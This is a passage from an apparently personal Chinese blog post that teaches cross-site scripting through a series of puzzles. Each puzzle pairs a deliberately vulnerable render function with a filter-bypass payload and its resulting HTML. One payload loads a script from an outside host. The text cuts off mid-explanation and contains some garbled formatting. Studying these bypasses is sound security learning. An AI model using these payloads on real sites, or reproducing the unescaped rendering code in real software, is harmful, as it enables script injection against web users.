Web安全XSS修炼计划

前言

XSS全称为跨站脚本攻击【Cross Site Scripting，为不与层叠样式表【Cascading Style Sheets, CSS缩写混淆，故此名为XSS。

XSS恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。

原理

• 攻击者对含有漏洞的服务器发起XSS攻击【注入JS代码。
• 诱使受害者打开受到攻击的服务器URL。
• 受害者在Web浏览器中打开URL，恶意脚本执行。

攻击方式

XSS可以分成二类：

• 非持久型XSS攻击：顾名思义，非持久型XSS攻击是一次性的，仅对当次的页面访问产生影响。非持久型XSS攻击要求用户访问一个被攻击者篡改后的链接，用户访问该链接时，被植入的攻击脚本被用户游览器执行，从而达到攻击目的。
• 持久型XSS攻击：持久型XSS，会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。

XSS也可以分成三类：

• 反射型：经过后端，不经过数据库。
• 存储型：经过后端，经过数据库。
• DOM型：不经过后端，DOM-Based XSS漏洞是基于文档对象模型【Document Objeet Model,DOM的一种漏洞，DOM-XSS是通过URL传入参数去控制触发的。

反射型XSS例题

题目出自这位dalao。

0X00

Server Code

function render (input) {
  return '<div>' + input + '</div>'
}

此处没有什么过滤，最基础的XSS攻击。

Input Code

<script>alert(1)</script>

Html

<div><script>alert(1)</script></div>

0X01

Server Code

function render (input) {
  return '<textarea>' + input + '</textarea>'
}

此处使用HTML中的** <p>**标签来接收输入的字符串。</p> <h5 id="笔记">笔记</h5> ** <textarea> <p>** 标签定义一个多行的文本输入控件。</p> <p>文本区域中可容纳无限数量的文本，其中的文本的默认字体是等宽字体【通常是<strong>Courier</strong>。</p> 因此绕过便需要使** <textarea>** 提前闭合，那么在输入的恶意代码前加上**

** 便可。

Input Code

<textarea><script>alert(1)</script>

Html

<textarea></textarea><script>alert(1)</script></textarea>

0X02

Server Code

function render (input) {
  return '<input type="name" value="' + input + '">'
}

依旧没过滤，闭合双引号及input标签就可以了。

Input Code

"><script>alert(1)</script>

Html

<input type="name" value=""><script>alert(1)</script>">

0X03

Server Code

function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

此处使用正则匹配了()并替换为空格。

那么只能使用HTML对()进行编码。

因此需要使用到onerror事件。

笔记

onerror 事件会在文档或图像加载过程中发生错误时被触发。

Input Code

<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

Html

<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0X04

Server Code

function render (input) {
  const stripBracketsRe = /[()**]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

如0X03。

Input Code

<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

Html

<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0X05

Server Code

function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

这儿使用replace函数将-->过滤了，防止构造闭合。

但是可以使用--!>来跳过注释。

Input Code

--!><script>alert(1)</script>

Html

<!-- --!><script>alert(1)</script> -->

0X06

Server Code

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

此处的.匹配的是除了换行符***之外的字符串，所以换行就行了。

并且这里return回去的是一个input标签。

那么可以使用其中的type属性进行一些操作，比如改成img再使用上面的oneerror或者改成button然后使用onclick操作。

Input Code

type="image" src="" onerror
="alert(1)"

type="button" 
onclick
="javascritp:alert(1)"

Html

<input value=1 type="image" src="" onerror
="alert(1)" type="text">

<input value=1 type="button" 
onclick
="javascritp:alert(1)" type="text">

0X07

Server Code

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi
  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

这里过滤了<开头>结尾的字符串，因此利用容错性，不构造>。

Input Code

<img src="" onerror ="alert(1)"

Html

<article><img src="" onerror ="alert(1)"</article>

0X08

Server Code

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>`
}

这里过滤了**

**，但并没有做什么其他的匹配。

所以在标签>之前空格或者换行即可。

Input Code

</style ><script>alert(1)</script>

Html

<style>
      </style ><script>alert(1)</script>
    </style>

0X09

Server Code

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

这里首先是需要匹配到https://www.segmentfault.com这一串字符。

然后在进行闭合**

这个标签，最后的">可以使用//**进行注释。

Input Code

https://www.segmentfault.com"></script><script>alert(1)</script>//

Html

<script src="https://www.segmentfault.com"></script><script>alert(1)</script>//"></script>

0X0A

Server Code

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&')
            .replace(/'/g, ''')
            .replace(/"/g, '"')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

这里过滤了&，便不能使用HTML编码绕过。

还过滤了‘、“、<、>、/，便不能再构造闭合。

因此只好利用URL的**@**引入外部的JavaScript文件。

Input Code

https://www.segmentfault.com@xss.southsea.st/myjs/copyright.js

Html

<script src="https:&#x2f&#x2fwww.segmentfault.com@xss.southsea.st&#x2fmyjs&#x2fcopyright.js"></script>

0X0B

Server Code

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

这里使用toUpperCase将字符串全部转化成为了大写。

那么有二解。

一是由于HTML大小写不敏感，所以可以直接构造** © 2018 – 2024 南溟NaN